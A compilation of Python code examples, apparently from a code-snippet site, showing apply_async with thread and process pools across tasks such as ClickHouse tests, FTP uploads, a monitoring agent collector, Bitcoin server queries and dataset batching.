for url in urls:
    futures.append(pool.apply_async(requests.get, ["http://"+url]))
 
 
i = 0
for future in futures:
    print("[+] requesting [http://www." + urls[i] + "]......")
    i = i + 1
    try:
        future.get()
    except KeyboardInterrupt:
        sys.exit()
    except Exception as e:
        print(str(e))
    #req_proc= multiprocessing.Process(target=requests.get, args=("http://" + url,), kwargs={'timeout':1,})
    #req_proc.start()
Example #32
0
def test_simple_replication_and_moves(start_cluster):
    try:
        for i, node in enumerate([node1, node2]):
            node.query("""
                CREATE TABLE replicated_table_for_moves (
                    s1 String
                ) ENGINE = ReplicatedMergeTree('/clickhouse/replicated_table_for_moves', '{}')
                ORDER BY tuple()
                SETTINGS storage_policy='moving_jbod_with_external', old_parts_lifetime=1, cleanup_delay_period=1, cleanup_delay_period_random_add=2
            """.format(i + 1))

        def insert(num):
            for i in range(num):
                node = random.choice([node1, node2])
                data = []  # 1MB in total
                for i in range(2):
                    data.append(get_random_string(512 * 1024))  # 500KB value
                node.query(
                    "INSERT INTO replicated_table_for_moves VALUES {}".format(
                        ','.join(["('" + x + "')" for x in data])))

        def optimize(num):
            for i in range(num):
                node = random.choice([node1, node2])
                node.query("OPTIMIZE TABLE replicated_table_for_moves FINAL")

        p = Pool(60)
        tasks = []
        tasks.append(p.apply_async(insert, (20, )))
        tasks.append(p.apply_async(optimize, (20, )))

        for task in tasks:
            task.get(timeout=60)

        node1.query("SYSTEM SYNC REPLICA replicated_table_for_moves",
                    timeout=5)
        node2.query("SYSTEM SYNC REPLICA replicated_table_for_moves",
                    timeout=5)

        node1.query("SELECT COUNT() FROM replicated_table_for_moves") == "40\n"
        node2.query("SELECT COUNT() FROM replicated_table_for_moves") == "40\n"

        data = []  # 1MB in total
        for i in range(2):
            data.append(get_random_string(512 * 1024))  # 500KB value

        time.sleep(3)  # wait until old parts will be deleted
        node1.query("SYSTEM STOP MERGES")
        node2.query("SYSTEM STOP MERGES")

        node1.query("INSERT INTO replicated_table_for_moves VALUES {}".format(
            ','.join(["('" + x + "')" for x in data])))
        node2.query("INSERT INTO replicated_table_for_moves VALUES {}".format(
            ','.join(["('" + x + "')" for x in data])))

        time.sleep(3)  # nothing was moved

        disks1 = get_used_disks_for_table(node1, "replicated_table_for_moves")
        disks2 = get_used_disks_for_table(node2, "replicated_table_for_moves")

        node1.query("SYSTEM START MERGES")
        node2.query("SYSTEM START MERGES")

        assert set(disks1) == set(["jbod1", "external"])
        assert set(disks2) == set(["jbod1", "external"])
    finally:
        for node in [node1, node2]:
            node.query("DROP TABLE IF EXISTS replicated_table_for_moves")
Example #33
0
    def abortable_ftp(cls, func, *args, **kwargs):

        try:
            timeout = kwargs.get('timeout', None)
            # size in Mbytes
            # get file name + ".lock" extension
            original_file, dir_c, dir_d = args
            file_ = original_file + ".lock"
            size = os.stat(file_).st_size / (1 << 20)
            connection_ok, ftp = cls.connect_ftp()
            if connection_ok:
                proc = ThreadPool(1)
                res = proc.apply_async(func, args=(
                    original_file,
                    ftp,
                ))
                try:
                    # Wait timeout seconds for func to complete.
                    upload_ok, duration = res.get(timeout)
                    file_ = cls.unlock_file(file_)
                    if not upload_ok:
                        shutil.move(file_, dir_c)
                        LOGGER.debug(
                            "Moved file back from repertory %s to repertory %s",
                            dir_d, dir_c)
                    else:
                        LOGGER.info(
                            "File %s of size %f Mo sent to Diffmet in %f s",
                            file_, size, duration)
                        Tools.remove_file(file_, "difmet archive", LOGGER)
                    ftp.quit()
                except multiprocessing.TimeoutError:
                    ftp.close()
                    proc.terminate()

                    LOGGER.error(
                        "Timeout of %f s exceeded for sending file %s"
                        " on difmet. Checking upload.", timeout, original_file)
                    _, ftp = cls.connect_ftp()
                    upload_ok = cls.check_transfer(basename(original_file),
                                                   ftp)
                    if upload_ok:
                        LOGGER.warning(
                            "Process hit the timeout but "
                            "file %s of size %f Mo was still sent to Diffmet",
                            file_, size)
                        Tools.remove_file(file_, "difmet archive", LOGGER)
                    else:
                        file_ = cls.unlock_file(file_)
                        LOGGER.error("FTP upload of %s s failed.", file_)
                        # move the file back from D to C
                        shutil.move(file_, dir_c)
                        LOGGER.debug(
                            "Moved file back from repertory %s to repertory %s",
                            dir_d, dir_c)
                except Exception as exc:
                    file_ = cls.unlock_file(file_)
                    trace = ''.join(
                        traceback.format_exception(type(exc), exc,
                                                   exc.__traceback__))
                    LOGGER.error(
                        "Error when uploading file %s with "
                        "trace :\n %s", file_, trace)
                    ftp.quit()
            else:
                file_ = cls.unlock_file(file_)
                LOGGER.error("Couldn't connect to FTP for uploading file %s ",
                             file_)
                # move the file back from D to C
                shutil.move(file_, dir_c)
                LOGGER.debug(
                    "Moved file back from repertory %s to repertory %s", dir_d,
                    dir_c)

            proc.terminate()
        except Exception as exc:
            trace = ''.join(
                traceback.format_exception(type(exc), exc, exc.__traceback__))
            LOGGER.error("Error when uploading file %s with "
                         "trace :\n %s", file_, trace)
Example #34
0
class Collector(util.Dimensions):

    """The collector is responsible for collecting data from each check and

    passing it along to the emitters, who send it to their final destination.
    """

    def __init__(self, agent_config, emitter, checksd):
        super(Collector, self).__init__(agent_config)
        self.agent_config = agent_config
        self.os = util.get_os()
        self.plugins = None
        self.emitter = emitter
        socket.setdefaulttimeout(15)
        self.run_count = 0
        self.continue_running = True
        self.collection_metrics = {}

        # is of type {check_name: check}
        initialized_checks_d = checksd['initialized_checks']

        self.pool_size = int(self.agent_config.get('num_collector_threads', 1))
        log.info('Using %d Threads for Collector' % self.pool_size)
        self.pool = Pool(self.pool_size)
        self.pool_full_count = 0
        self.collection_times = {}
        self.collection_results = {}
        self.collect_runs = 0
        for check in initialized_checks_d:
            derived_collect_periods = 1
            if 'collect_period' in check.init_config:
                if check.init_config['collect_period'] < 0:
                    log.warn('Invalid negative time parameter. '
                             'collect_period for %s will be reset '
                             'to default' % check.name)
                else:
                    # This equation calculates on which nth run the plugin
                    # gets called. It converts the collect_period from seconds
                    # to an integer which holds the collection round the
                    # plugin should get called on.
                    derived_collect_periods = (
                        ((check.init_config['collect_period'] - 1)
                         / agent_config['check_freq']) + 1)
            self.collection_times[check.name] = {
                'check': check,
                'last_collect_time': 99999999,
                'derived_collect_periods': derived_collect_periods}
        self.pool_full_max_retries = int(self.agent_config.get('pool_full_max_retries',
                                                               4))

    def _emit(self, payload):
        """Send the payload via the emitter.
        """
        # Don't try to send to an emitter if we're stopping.
        if self.continue_running:
            try:
                self.emitter(payload, log, self.agent_config['forwarder_url'])
            except Exception:
                log.exception("Error running emitter: %s" % self.emitter.__name__)

    def _set_status(self, collect_duration):
        if self.run_count <= FLUSH_LOGGING_INITIAL or self.run_count % FLUSH_LOGGING_PERIOD == 0:
            log.info("Finished run #%s. Collection time: %.2fs." %
                     (self.run_count, round(collect_duration, 2)))
            if self.run_count == FLUSH_LOGGING_INITIAL:
                log.info("First flushes done, next flushes will be logged every %s flushes." %
                         FLUSH_LOGGING_PERIOD)

        else:
            log.debug("Finished run #%s. Collection time: %.2fs." %
                      (self.run_count, round(collect_duration, 2),))

    def add_collection_metric(self, name, value):
        self.collection_metrics[name] = value

    def collector_stats(self, num_metrics, collection_time):
        thread_count = threading.active_count()
        self.add_collection_metric('monasca.thread_count', thread_count)
        if thread_count > MAX_THREADS_COUNT:
            log.warn("Collector thread count is high: %d" % thread_count)

        self.add_collection_metric('monasca.collection_time_sec', collection_time)

    def run(self, check_frequency):
        """Collect data from each check and submit their data.

        Also, submit a metric which is how long the checks_d took
        """
        timer = util.Timer()
        self.run_count += 1
        log.debug("Starting collection run #%s" % self.run_count)

        # checks_d checks
        num_metrics = self.run_checks_d(check_frequency)

        collect_duration = timer.step()

        # Warn if collection time is approaching the collection period
        if collect_duration > (4 * check_frequency / 5):
            log.warn("Collection time (s) is high: %.1f, metrics count: %d" %
                     (collect_duration, num_metrics))

        self.collector_stats(num_metrics, collect_duration)
        collect_stats = []
        dimensions = {'component': 'monasca-agent', 'service': 'monitoring'}
        # Add in metrics on the collector run
        for name, value in self.collection_metrics.items():
            metric = metrics.Metric(name,
                                    self._set_dimensions(dimensions),
                                    tenant=None)
            collect_stats.append(metric.measurement(value, time.time()))
        self.collection_metrics.clear()
        self._emit(collect_stats)

        # Persist the status of the collection run.
        self._set_status(collect_duration)

    def run_single_check(self, check):
        """Run a single check

        returns number of measurement collected, collection time
        """

        sub_timer = util.Timer()
        count = 0
        log.debug("Running plugin %s" % check.name)
        try:

            # Run the check.
            check.run()

            current_check_metrics = check.get_metrics()

            # Emit the metrics after each check
            self._emit(current_check_metrics)

            # Save the status of the check.
            count += len(current_check_metrics)

        except Exception:
            log.exception("Error running plugin %s" % check.name)

        sub_collect_duration = sub_timer.step()
        sub_collect_duration_mills = sub_collect_duration * 1000
        log.debug("Finished plugin %s run. Collection time: %.2fms %d Metrics." % (
                  check.name, round(sub_collect_duration_mills, 2), count))
        if sub_collect_duration > util.get_sub_collection_warn():
            log.warn("Collection time for check %s is high: %.2fs." % (
                     check.name, round(sub_collect_duration, 2)))
        return count, sub_collect_duration_mills

    def wait_for_results(self, check_frequency, start_time):
        """Wait either for all running checks to finish or
        for check_frequency seconds, whichever comes first

        returns number of measurements collected
        """

        # Make sure we check for results at least once
        wait_time = check_frequency / 10
        measurements = 0
        time_left = check_frequency
        while time_left > 0 and self.collection_results:
            for check_name in list(self.collection_results.keys()):
                result = self.collection_results[check_name]['result']
                result.wait(wait_time)
                if result.ready():
                    log.debug('Plugin %s has completed' % check_name)
                    if not result.successful():
                        log.error('Plugin %s failed' % check_name)
                    else:
                        count, collect_time = result.get()
                        measurements += count
                        self.collection_times[check_name]['last_collect_time'] = collect_time
                    del self.collection_results[check_name]
                else:
                    log.debug('Plugin %s still running' % check_name)
            time_left = start_time + check_frequency - time.time()
        return measurements

    def start_checks_in_thread_pool(self, start_time):
        """Add the checks that are not already running to the Thread Pool
        """

        # Sort by the last collection time so the checks that take the
        # least amount of time are run first so they are more likely to
        # complete within the check_frequency
        sorted_checks = sorted(self.collection_times.values(),
                               key=lambda x: x['last_collect_time'])
        for entry in sorted_checks:
            check = entry['check']
            last_collect_time = entry['last_collect_time']
            if not self.continue_running:
                break
            if check.name in self.collection_results:
                log.warning('Plugin %s is already running, skipping' % check.name)
                continue
            if self.collect_runs % entry['derived_collect_periods'] != 0:
                log.debug('%s has not skipped enough collection periods yet. '
                          'Skipping.' % check.name)
                continue
            log.debug('Starting plugin %s, old collect time %d' %
                      (check.name, last_collect_time))
            async_result = self.pool.apply_async(self.run_single_check, [check])
            self.collection_results[check.name] = {'result': async_result,
                                                   'start_time': start_time}
        self.collect_runs += 1

    def run_checks_d(self, check_frequency):
        """Run defined checks_d checks using the Thread Pool.

        returns number of Measurements.
        """

        start_time = time.time()
        self.start_checks_in_thread_pool(start_time)

        measurements = self.wait_for_results(check_frequency, start_time)

        # See if any checks are still running
        if self.collection_results:
            # Output a metric that can be used for Alarming. This metric is only
            # emitted when there are checks running too long so a deterministic
            # Alarm Definition should be created when monitoring it
            self.add_collection_metric('monasca.checks_running_too_long',
                                       len(self.collection_results))
            for check_name in self.collection_results:
                run_time = time.time() - self.collection_results[check_name]['start_time']
                log.warning('Plugin %s still running after %d seconds' % (
                            check_name, run_time))

        if len(self.collection_results) >= self.pool_size:
            self.pool_full_count += 1
            if (self.pool_full_count > self.pool_full_max_retries):
                log.error('Thread Pool full and %d plugins still running for '
                          '%d collection cycles, exiting' %
                          (len(self.collection_results), self.pool_full_count))
                os._exit(1)
        else:
            self.pool_full_count = 0

        return measurements

    def stop(self, timeout=0):
        """Tell the collector to stop at the next logical point.
        """
        # This is called when the process is being killed, so
        # try to stop the collector as soon as possible.
        # Most importantly, don't try to submit to the emitters
        # because the forwarder is quite possibly already killed
        # in which case we'll get a misleading error in the logs.
        # Best to not even try.

        log.info("stopping the collector with timeout %d seconds" % timeout)

        self.continue_running = False
        for check_name in self.collection_times:
            check = self.collection_times[check_name]['check']
            check.stop()

        for check_name in self.collection_results:
            run_time = time.time() - self.collection_results[check_name]['start_time']
            log.info('When exiting... Plugin %s still running after %d seconds' % (
                check_name, run_time))

        self.pool.close()

        # Won't call join() if timeout is zero. If we are in an event thread,
        # a BlockingSwitchOutError occurs if we wait.

        if (timeout > 0):
            timer = util.Timer()
            for worker in self.pool._pool:
                t = timeout - timer.total()
                if t <= 0:
                    break
                if worker.is_alive():
                    try:
                        worker.join(t)
                    except Exception:
                        log.error("Unexpected error: ", sys.exc_info()[0])

        for worker in self.pool._pool:
            if worker.is_alive():
                # the worker didn't complete in the specified timeout.
                # collector must honor the stop request to avoid agent stop/restart hang.
                # os._exit() should be called after collector stops.
                log.info('worker %s is still alive when collector stop times out.' % worker.name)
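# A stripped-down sketch of the AsyncResult polling pattern that
# wait_for_results() above relies on; the check functions and the time budget
# are hypothetical:
import time
from multiprocessing.dummy import Pool as ThreadPool

def check_a():
    time.sleep(0.2)
    return 3  # pretend this check produced 3 measurements

def check_b():
    raise RuntimeError('plugin failed')

pool = ThreadPool(2)
pending = {'check_a': pool.apply_async(check_a),
           'check_b': pool.apply_async(check_b)}
deadline = time.time() + 5  # overall collection budget in seconds
collected = 0
while pending and time.time() < deadline:
    for name in list(pending):
        result = pending[name]
        result.wait(0.1)            # poll briefly instead of blocking forever
        if result.ready():
            if result.successful():
                collected += result.get()
            del pending[name]
pool.close()
pool.join()
print('collected %d measurements' % collected)  # -> 3; check_b failed and was dropped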
Example #35
0
 def __init__(self, model_path, parallel, batch_size, bootstrap, vocab_txt):
     config = tf.ConfigProto(inter_op_parallelism_threads=parallel,
                             intra_op_parallelism_threads=1)
     os.environ['NEURONCORE_GROUP_SIZES'] = ','.join(
         '1' for _ in range(parallel))
     self.predictor_list = [
         tf.contrib.predictor.from_saved_model(model_path, config=config)
         for _ in range(parallel)
     ]
     if self.predictor_list[0].feed_tensors[
             'input_ids'].shape.is_fully_defined():
         self.batch_size = self.predictor_list[0].feed_tensors[
             'input_ids'].shape.as_list()[0]
     else:
         self.batch_size = batch_size
     self.bootstrap = bootstrap
     self.tokenizer = tokenization.FullTokenizer(vocab_file=vocab_txt,
                                                 do_lower_case=True)
     self.num_infer = 0
     self.num_correct = 0
     self.output_name = list(self.predictor_list[0].fetch_tensors.keys())[0]
     self.iid = 0
     self.throughput_list = []
     self.latency_list = []
     self.max_len_latency_list = 1000
     self.iid_lock = Lock()
     if bootstrap:
         self.request_queue_list = [
             collections.deque() for _ in range(parallel)
         ]
         eval_data_path = os.path.join(os.path.dirname(__file__),
                                       'glue_mrpc_dev.tsv')
         tsv = mrpc_feature.read_tsv(eval_data_path)
         for request_queue in self.request_queue_list:
             for _ in range(1024):
                 data_list = random.choices(tsv[1:], k=self.batch_size)
                 model_feed_dict_list = [
                     mrpc_feature.text_pair_to_model_feed_dict(
                         data[3], data[4], self.tokenizer)
                     for data in data_list
                 ]
                 label_list = [int(data[0]) for data in data_list]
                 batch_labels = np.array(label_list)
                 batch_feeds = {
                     key: np.concatenate(
                         [feed[key] for feed in model_feed_dict_list],
                         axis=0)
                     for key in model_feed_dict_list[0].keys()
                 }
                 request_queue.append((batch_feeds, batch_labels))
     else:
         self.request_queue_list = [[] for _ in range(parallel)]
     self.result_map = {}
     self.alive = True
     dummy_feed = {
         'input_ids': np.zeros([1, 128], dtype=np.int32),
         'input_mask': np.zeros([1, 128], dtype=np.int32),
         'segment_ids': np.zeros([1, 128], dtype=np.int32),
     }
     self.dummy_feeds = [(None, dummy_feed) for _ in range(self.batch_size)]
     model_feed_dict_list = [dummy_feed for _ in range(self.batch_size)]
     batch_feeds = {
         key: np.concatenate([feed[key] for feed in model_feed_dict_list],
                             axis=0)
         for key in model_feed_dict_list[0].keys()
     }
     pool = Pool(len(self.predictor_list))
     for pred in self.predictor_list:
         pool.apply_async(pred, (batch_feeds, ))
         time.sleep(1)
     pool.close()
     pool.join()
Example #36
0
class btc_processor(threading.Thread):
    # Thread to handle BTC operations. Queries multiple stratum servers in case of failure
    # Requires a SOCKS proxy to be provided - by default the Tor SOCKS proxy is used

    def __init__(self, socks_proxy, socks_port, stratum_servers, req_queue,
                 res_queue):
        self.socks_proxy = socks_proxy
        self.socks_port = socks_port
        self.request_queue = req_queue
        self.response_queue = res_queue
        self.stratum_servers = stratum_servers
        self.running = True
        self.pool = ThreadPool(
            processes=4
        )  # maximum of 4 BTC operations will be allowed in parallel
        threading.Thread.__init__(self)

    def get_random_server(self):
        x = random.randrange(0, len(self.stratum_servers) - 1, 1)
        (serverstring, ) = self.stratum_servers[x]
        (server, port, connectiontype) = str(serverstring).split(':')
        return (server, port, connectiontype)

    def get_stratum_peers(self):
        attempts = 0
        while attempts < 8:
            sleep(1)
            (server, port, connectiontype) = self.get_random_server()
            print "Info: Updating list of stratum peers via " + str(
                server) + " attempt #" + str(attempts)
            try:
                jsonrpc = JSONRPCProxy(str(server),
                                       int(port),
                                       socks_host=str(self.socks_proxy),
                                       socks_port=int(self.socks_port),
                                       connect_timeout=30)
                response = jsonrpc.request('server.peers.subscribe',
                                           timeout=15)
                if not isinstance(response, list):
                    attempts += 1
                    continue
                return (response)
            except:
                attempts += 1
                print "Warning: BTC processor could not query peers on stratum server " + str(
                    server)
                continue
        return  # error

    def cb_get_stratum_peers(self, response):
        if response:  # If get peers returned data then process it
            peers = []
            for peer in response:
                #print peer
                port = None  # initialise so peers without a 'p'/'s' entry do not raise NameError
                sport = None
                ssl = False
                for item in peer[2]:
                    if item[0] == 'p':
                        port = item[1:]
                    if item[0] == 's':
                        ssl = True
                        sport = item[1:]
                if sport:  # prefer the ssl port if specified
                    port = sport
                if ssl:  # only use servers that support ssl
                    peers.append(
                        (peer[1] + ':' + port + ':s', ))  # why the tuple?
                    #print peers[-1]
            response_msg = queue_task(0, 'btc_update_stratum_peers',
                                      {'peers': peers})
            # Update our list of peers # TODO - this could be checked and merged with a known-good electrum server list
            self.stratum_servers = peers  # update the local list of peers
            self.response_queue.put(
                response_msg
            )  # also update the backend thread with the current peers so that the config database can be updated
            # TODO: implement dead host checking, especially needed for access through Tor
        else:
            print "Warning: BTC processor unable to refresh list of stratum peers, giving up for now"

    def get_balance(self, addr):
        attempts = 0
        while attempts < 8:
            sleep(1)
            (server, port, connectiontype) = self.get_random_server()
            print "Info: Checking BTC balance for " + str(
                addr) + " via " + str(server)
            try:
                jsonrpc = JSONRPCProxy(str(server),
                                       int(port),
                                       socks_host=str(self.socks_proxy),
                                       socks_port=int(self.socks_port),
                                       connect_timeout=30)
                if isinstance(addr, list):
                    response = []
                    for addr_item in addr:
                        response.append(
                            (addr_item,
                             jsonrpc.request('blockchain.address.get_balance',
                                             [addr_item],
                                             timeout=15)))
                    return (response)
                else:
                    response = jsonrpc.request(
                        'blockchain.address.get_balance', [addr], timeout=15)
                    if not isinstance(response, dict):
                        #print "Balance is not a dict..."
                        attempts += 1
                        continue
                    return (addr, response)
            except:
                attempts += 1
                print "Warning: BTC processor could not query balance on stratum server " + str(
                    server)
                continue
        return (addr, -1)  # error , return -1

    def cb_get_balance(self, response):
        # TODO - refactor this!
        if not isinstance(response, list):
            (address, balance) = response
            if balance == -1:
                print "Warning: BTC processor unable to get balance for address " + str(
                    address) + ", giving up for now"
                response_msg = queue_task(
                    0, 'btc_update_balance', {
                        'address': address,
                        'balance_confirmed': -1,
                        'balance_unconfirmed': -1
                    })
            else:
                response_msg = queue_task(
                    0, 'btc_update_balance', {
                        'address': address,
                        'balance_confirmed': balance['confirmed'],
                        'balance_unconfirmed': balance['unconfirmed']
                    })
            self.response_queue.put(response_msg)
        else:
            for response_item in response:
                (address, balance) = response_item
                if balance == -1:
                    print "Warning: BTC processor unable to get balance for address " + str(
                        address) + ", giving up for now"
                    response_msg = queue_task(
                        0, 'btc_update_balance', {
                            'address': address,
                            'balance_confirmed': -1,
                            'balance_unconfirmed': -1
                        })
                else:
                    response_msg = queue_task(
                        0, 'btc_update_balance', {
                            'address': address,
                            'balance_confirmed': balance['confirmed'],
                            'balance_unconfirmed': balance['unconfirmed']
                        })
                self.response_queue.put(response_msg)

    def get_unspent(self, addr):
        attempts = 0
        while attempts < 8:
            sleep(1)
            (server, port, connectiontype) = self.get_random_server()
            print "Info: Checking BTC unspent outputs for " + str(
                addr) + " via " + str(server)
            try:
                jsonrpc = JSONRPCProxy(str(server),
                                       int(port),
                                       socks_host=str(self.socks_proxy),
                                       socks_port=int(self.socks_port),
                                       connect_timeout=30)
                if isinstance(addr, list):
                    response = []
                    for addr_item in addr:
                        response.append(
                            (addr_item,
                             jsonrpc.request('blockchain.address.listunspent',
                                             [addr_item],
                                             timeout=15)))
                    return (response)
                else:
                    response = jsonrpc.request(
                        'blockchain.address.get_history', [addr], timeout=15)
                    if not isinstance(response, list):
                        print "History is not a list..."
                        attempts += 1
                        continue
                    return (addr, response)
            except:
                attempts += 1
                print "Warning: BTC processor could not query balance on stratum server " + str(
                    server)
                continue
        return (addr, -1)  # error , return -1

    def cb_get_unspent(self, response):
        # TODO - refactor this!
        if not isinstance(response, list):
            (address, unspent) = response
            if unspent == -1:
                print "Warning: BTC processor unable to get unspent outputs for address " + str(
                    address) + ", giving up for now"
                response_msg = queue_task(0, 'btc_update_unspent', {
                    'address': address,
                    'unspent_outputs': -1
                })
            else:
                response_msg = queue_task(0, 'btc_update_unspent', {
                    'address': address,
                    'unspent_outputs': unspent
                })
            self.response_queue.put(response_msg)
        else:
            for response_item in response:
                (address, unspent) = response_item
                if unspent == -1:
                    print "Warning: BTC processor unable to get unspent outputs for address " + str(
                        address) + ", giving up for now"
                    response_msg = queue_task(0, 'btc_update_unspent', {
                        'address': address,
                        'unspent_outputs': -1
                    })
                else:
                    response_msg = queue_task(0, 'btc_update_unspent', {
                        'address': address,
                        'unspent_outputs': unspent
                    })
                self.response_queue.put(response_msg)

    def run(self):
        print "Info: BTC processor thread started using SOCKS proxy " + self.socks_proxy + ":" + self.socks_port + " attempting to refresh stratum peers"

        self.pool.apply_async(self.get_stratum_peers, (),
                              callback=self.cb_get_stratum_peers)

        while self.running:
            if not self.request_queue.empty():
                # New BTC processing tasks are here
                task = self.request_queue.get()
                if task.command == 'btc_balance_check':
                    address = task.data[
                        'address']  # may be single address or list
                    self.pool.apply_async(self.get_balance, (address, ),
                                          callback=self.cb_get_balance)
                elif task.command == 'btc_get_unspent':
                    address = task.data[
                        'address']  # may be single address or list
                    self.pool.apply_async(self.get_unspent, (address, ),
                                          callback=self.cb_get_unspent)
                elif task.command == 'btc_broadcast_txn':
                    txn = task.data['txn']
                    # TODO: Send txn
                elif task.command == 'shutdown':
                    self.running = False
                else:
                    print "Warning: BTC Processor thread received unknown BTC command - " + task.command
            sleep(0.1)  # rest

        print "Info: BTC Processor shutting down"
        self.pool.close()
        self.pool.join()
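The btc_processor above submits each lookup with pool.apply_async and lets the callback push results onto a response queue. A stripped-down sketch of that submit-with-callback flow; the fetch_balance function and queue names are illustrative, not part of the original:

# Sketch of the apply_async + callback pattern used above (illustrative names only).
from multiprocessing.dummy import Pool as ThreadPool
from queue import Queue

response_queue = Queue()


def fetch_balance(address):
    # Stand-in for a network lookup; real code would query a server here.
    return address, 42


def on_result(result):
    # Called with the return value once fetch_balance completes.
    response_queue.put(result)


pool = ThreadPool(processes=4)
for addr in ['addr1', 'addr2', 'addr3']:
    pool.apply_async(fetch_balance, (addr,), callback=on_result)
pool.close()
pool.join()

while not response_queue.empty():
    print(response_queue.get())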
Example #37
0
    for i in range(10):
        r = requests.get(node[str(i)] + '/timerstart')



    for i in range(9):
        target_url = node[str(i)] + '/startwork'
        futures.append(pool.apply_async(requests.get, [target_url]))
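The snippet above only collects the AsyncResult handles returned by apply_async into futures; the example is cut off before they are consumed. A typical continuation, under the assumption that pool is a thread pool and node maps index strings to base URLs (the node map below is a placeholder), waits on each handle with get():

# Hypothetical continuation: waiting on the AsyncResult handles collected above.
from multiprocessing.dummy import Pool as ThreadPool
import requests

node = {str(i): 'http://127.0.0.1:500%d' % i for i in range(10)}  # placeholder node map

pool = ThreadPool(10)
futures = [pool.apply_async(requests.get, [node[str(i)] + '/startwork']) for i in range(10)]
pool.close()

for f in futures:
    try:
        resp = f.get(timeout=30)   # blocks until the request finishes
        print(resp.status_code)
    except Exception as exc:       # a failed request surfaces here
        print('request failed:', exc)

pool.join()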
Example #38
0
    html = get_page(url, i)
    # print(html)
    if html:
        data = get_page_detail(html)
        for item in data:
            result = save_to_mongo(item)
            if result:
                l.append(item)
    else:
        print('No data on this page')


if __name__ == '__main__':
    groups = [x for x in range(GROUP_START, GROUP_END + 1)]

    try:
        requestDatas(True)
        pool = ThreadPool(4)
        for idx, item in enumerate(groups):
            # print(str(idx) + ":" + str(item))
            pool.apply_async(main, (item, ))

        pool.close()
        pool.join()

        mongo_obj = MongodbConn()
        mongo_obj.run()
    except:
        pass
Example #39
0
        def iterate(dataset, batch_size):
            num_shards = dataset.get_number_shards()
            if not deterministic:
                shard_perm = np.random.permutation(num_shards)
            else:
                shard_perm = np.arange(num_shards)

            # (ytz): Depending on the application, thread-based pools may be faster
            # than process based pools, since process based pools need to pickle/serialize
            # objects as an extra overhead. Also, as hideously un-thread-safe as this
            # looks, we're actually protected by the GIL.
            pool = Pool(1)  # mp.dummy aliases ThreadPool to Pool
            next_shard = pool.apply_async(dataset.get_shard, (shard_perm[0], ))

            total_yield = 0

            if batch_size is None:
                num_global_batches = num_shards
            else:
                num_global_batches = math.ceil(dataset.get_shape()[0][0] /
                                               batch_size)

            cur_global_batch = 0
            cur_shard = 0
            carry = None

            while cur_global_batch < num_global_batches:

                X, y, w, ids = next_shard.get()
                if cur_shard < num_shards - 1:
                    next_shard = pool.apply_async(
                        dataset.get_shard, (shard_perm[cur_shard + 1], ))
                else:
                    pool.close()

                if carry is not None:
                    X = np.concatenate([carry[0], X], axis=0)
                    if y is not None:
                        y = np.concatenate([carry[1], y], axis=0)
                    if w is not None:
                        w = np.concatenate([carry[2], w], axis=0)
                    ids = np.concatenate([carry[3], ids], axis=0)
                    carry = None

                n_shard_samples = X.shape[0]
                cur_local_batch = 0
                if batch_size is None:
                    shard_batch_size = n_shard_samples
                else:
                    shard_batch_size = batch_size

                num_local_batches = math.ceil(n_shard_samples /
                                              shard_batch_size)

                if n_shard_samples == 0:
                    cur_shard += 1
                    continue
                if not deterministic:
                    sample_perm = np.random.permutation(n_shard_samples)
                else:
                    sample_perm = np.arange(n_shard_samples)

                while cur_local_batch < num_local_batches:
                    start = cur_local_batch * shard_batch_size
                    end = min(n_shard_samples,
                              (cur_local_batch + 1) * shard_batch_size)

                    indices = range(start, end)
                    perm_indices = sample_perm[indices]
                    X_b = X[perm_indices]

                    if y is not None:
                        y_b = y[perm_indices]
                    else:
                        y_b = None

                    if w is not None:
                        w_b = w[perm_indices]
                    else:
                        w_b = None

                    ids_b = ids[perm_indices]

                    assert len(X_b) <= shard_batch_size
                    if len(
                            X_b
                    ) < shard_batch_size and cur_shard != num_shards - 1:
                        assert carry is None
                        carry = [X_b, y_b, w_b, ids_b]
                    else:

                        # (ytz): this skips everything except possibly the last shard
                        if pad_batches:
                            (X_b, y_b, w_b,
                             ids_b) = pad_batch(shard_batch_size, X_b, y_b,
                                                w_b, ids_b)

                        yield X_b, y_b, w_b, ids_b
                        cur_global_batch += 1
                    cur_local_batch += 1
                cur_shard += 1
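The iterator above overlaps disk I/O with batching by asking a single-worker pool to load the next shard while the current one is being sliced. The same prefetch idea in isolation, with a stand-in load_shard function that is not part of the original dataset API:

# Prefetching sketch: load shard k+1 in the background while shard k is processed.
from multiprocessing.dummy import Pool  # thread pool; cheap handoff, no pickling
import time


def load_shard(idx):
    time.sleep(0.2)          # stand-in for slow disk I/O
    return [idx] * 4         # stand-in for the shard's samples


num_shards = 3
pool = Pool(1)
next_shard = pool.apply_async(load_shard, (0,))

for cur in range(num_shards):
    data = next_shard.get()                      # wait for the prefetched shard
    if cur < num_shards - 1:
        next_shard = pool.apply_async(load_shard, (cur + 1,))  # kick off the next load
    else:
        pool.close()
    print('processing shard', cur, 'with', len(data), 'samples')

pool.join()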
Example #40
0
def call(args):

    ####################################################################
    # Options
    ####################################################################

    remove_lock = args.remove_lock
    ignore_lock = args.ignore_lock
    force = args.force
    skip = args.skip
    verbose = args.verbose

    scan_cycle = args.cycle
    resolution = args.resolution
    diffeomorphism_nb = args.diffeomorphism_nb

    if args.new_diffeomorphism is None:
        new_diffeomorphism = diffeomorphism_nb
    else:
        new_diffeomorphism = args.new_diffeomorphism

    if (resolution is None) or (resolution == 'native') or np.isclose(
            resolution, 0):
        resolution = None

    ####################################################################
    # Study
    ####################################################################

    study = get_study(args)

    if study is None:
        print('No study found. Nothing to do.')
        return

    study.set_rigids(args.rigids)
    study.set_diffeomorphism(new_diffeomorphism)
    #study.set_standard_space('isometric')

    ####################################################################
    # Create iterator
    ####################################################################

    study_iterator = study.iterate('session',
                                   'reference_maps',
                                   'result',
                                   'population_map',
                                   new=['population_map'],
                                   integer_index=True,
                                   verbose=args.verbose)

    df = study_iterator.df.copy()

    df['locked'] = False

    ####################################################################
    # Wrapper
    ####################################################################

    def wm(index, name, session, reference_maps, population_map, result,
           file_population_map):

        if type(population_map) is Lock:
            if remove_lock or ignore_lock:
                if verbose:
                    print('{}: Remove lock'.format(name.name()))
                population_map.unlock()
                if remove_lock:
                    return
            else:
                if verbose:
                    print('{}: Locked'.format(name.name()))
                return

        elif population_map is not None and not force:
            if verbose:
                print(
                    '{}: PopulationMap already exists. Use -f/--force to overwrite'
                    .format(name.name()))
            return

        if skip:
            return

        if verbose:
            print('{}: Lock: {}'.format(name.name(), file_population_map))

        lock = Lock(name, 'fmripop', file_population_map)
        df.ix[index, 'locked'] = True

        dfile = os.path.dirname(file_population_map)
        if dfile and not isdir(dfile):
            os.makedirs(dfile)

        lock.save(file_population_map)

